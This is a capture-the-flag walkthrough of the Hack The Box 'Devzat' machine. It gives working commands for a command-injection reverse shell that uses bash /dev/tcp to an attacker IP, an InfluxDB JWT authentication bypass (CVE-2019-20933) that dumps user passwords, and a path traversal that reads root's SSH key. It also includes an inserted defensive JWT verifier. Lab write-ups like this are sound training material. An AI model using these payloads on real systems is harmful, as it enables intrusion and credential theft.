nmap -p- --min-rate 5000 10.10.11.118 -Pn

After detecting the open ports, let's run a more detailed nmap scan against them.

nmap -A -sC -sV -p22,80,8000 10.10.11.118 -Pn

From the nmap scan result, I see that the IP address resolves to the devzat.htb domain, so I add it to the /etc/hosts file for name resolution.

The web application looks like this.

Let's do subdomain enumeration with wfuzz.

wfuzz -u http://devzat.htb -H 'Host: FUZZ.devzat.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hw 26

Let's add the pets.devzat.htb domain to the /etc/hosts file.

I looked at the web application.

Let's run an nmap scan against port 80 of pets.devzat.htb.

nmap -A -sC -sV -p80 pets.devzat.htb -Pn

I find an exposed .git directory, so let's dump it with git-dumper.

python3 git_dumper.py http://pets.devzat.htb/.git/ /home/kali/Desktop/pets_devzat_htb/

Let's analyse the source code.

I looked at the addPet function, which I had already exercised by adding a cat on the website, and it is vulnerable because of missing input validation.

This means I can inject whatever value I want here.

Let's fire up OWASP ZAP and start pentesting the API.

Our POST request to the API looks like this.

Let's inject some payloads into the species parameter. I add a directory traversal payload here.

I see the result of my payload below.

Let's inject a reverse shell payload here.

curl -X POST http://pets.devzat.htb/api/pet -d '{ "name": "dr4ks",  "species": "cat; bash -c \"bash -i >& /dev/tcp/10.10.14.18/1337 0>&1\"" }' -H 'Content-Type: application/json'

Hola, I got a reverse shell on port 1337.

Let's upgrade to an interactive shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo; fg
export TERM=xterm
export SHELL=bash

Looking for a privilege escalation vector, I run netstat -ntpl to see the listening ports on the victim machine.

Here I see that port 8086 is open, so I curl it.

curl -v http://127.0.0.1:8086/

That's InfluxDB, version 1.7.5.

I found a publicly known vulnerability for this version of InfluxDB: CVE-2019-20933.

It means we need to create a JWT with username and exp claims, signed with the HS256 algorithm (the signing secret is the empty string), as below.

We can do this from a Python shell.

import jwt   # PyJWT
import time
# exp a little in the future, username admin, and an empty string as the HS256 key
jwt.encode({"exp": time.time()+10000, "username": "admin"}, "", algorithm="HS256")

Note: Don't forget to set the username field to admin.
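
The bypass works because InfluxDB 1.7.5 validates HS256 tokens against its configured shared secret even when that secret is empty, so a signature computed with an empty key is accepted. The Python below is an added example, not part of this writeup or of InfluxDB's code: a minimal verifier for such bearer tokens that shows the fixed behaviour, refusing to authenticate when no shared secret is configured and checking the alg, signature, username and exp claims. The secret value and claims it uses are constructed for illustration.

```python
import base64
import hashlib
import hmac
import json
import time

def _b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def _b64url_decode(part):
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def sign_hs256(claims, secret):
    # Plain HS256 signing (what the PyJWT call above does); used here only to build tokens to test.
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url(json.dumps(claims).encode())
    mac = hmac.new(secret.encode(), f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(mac)}"

def verify_hs256(token, shared_secret, now=None):
    """Verify an InfluxDB-style bearer token and return its claims.
    Refusing an empty shared secret is the point: with no secret configured, no
    token can be trusted, yet accepting them anyway is the CVE-2019-20933 bypass
    (anyone can compute HMAC-SHA256 with an empty key)."""
    if not shared_secret:
        raise ValueError("no shared-secret configured; refusing JWT auth")
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    if json.loads(_b64url_decode(header_b64)).get("alg") != "HS256":
        raise ValueError("unexpected alg")  # pin the algorithm server-side
    signed = f"{header_b64}.{payload_b64}".encode()
    expected = hmac.new(shared_secret.encode(), signed, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(_b64url_decode(payload_b64))
    if "username" not in claims or "exp" not in claims:
        raise ValueError("missing username/exp claim")
    if claims["exp"] <= (time.time() if now is None else now):
        raise ValueError("token expired")
    return claims

def token_accepted(token, shared_secret, now=None):
    """True if the token would authenticate, False on any verification failure."""
    try:
        return verify_hs256(token, shared_secret, now) is not None
    except ValueError:
        return False
```

A token signed with the empty key is rejected both when the server has no secret (auth refused outright) and when it has one (signature mismatch); only a token signed with the configured secret, carrying username and an unexpired exp, authenticates.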

Let's use this JWT in the Authorization header when making requests to InfluxDB, as below.

curl -G localhost:8086/query?pretty=true --data-urlencode "q=SHOW DATABASES" -H "Authorization: Bearer {jwt}"

I just need the devzat database and its user table. We send a query against this table to dump all users' data.

curl -G --data-urlencode "q=select * from \"user\"" -d "db=devzat" localhost:8086/query?pretty=true -H "Authorization: Bearer $token"

I dump the usernames and their passwords as below.

wilhelm: WillyWonka2021
catherine: woBeeYareedahc7Oogeephies7Aiseci
charles: RoyalQueenBee$

Let's check the credentials of the catherine user.

user.txt

In the /var/backups folder, I find two .zip files and download both to my machine.

First, we need to start an HTTP server on the victim machine.

python3 -m http.server --bind 10.10.11.118 1337

Second, we use wget to download the files.

wget http://10.10.11.118:1337/devzat-main.zip
wget http://10.10.11.118:1337/devzat-dev.zip

I unzip devzat-dev.zip and find a file called commands.go, whose fileCommand() function leaks a password.

Password: CeilingCatStillAThingIn2021?

From the victim machine, we need to connect to port 8443 via ssh.

It is devbot.

Reminder! To work with devbot, you need a stable connection, not the shell you got from the reverse shell. For that reason, add your public key to the victim machine and connect to it with your private key via ssh to get a persistent shell.

ssh -p 8443 dr4ks@localhost

I check which commands my user can and cannot run.

Let's use the bot's /file command with our leaked password.

root.txt

Let's get a persistent shell; for this, we need to grab the root user's private key (id_rsa).

/file ../.ssh/id_rsa CeilingCatStillAThingIn2021?

I got a persistent shell, finally.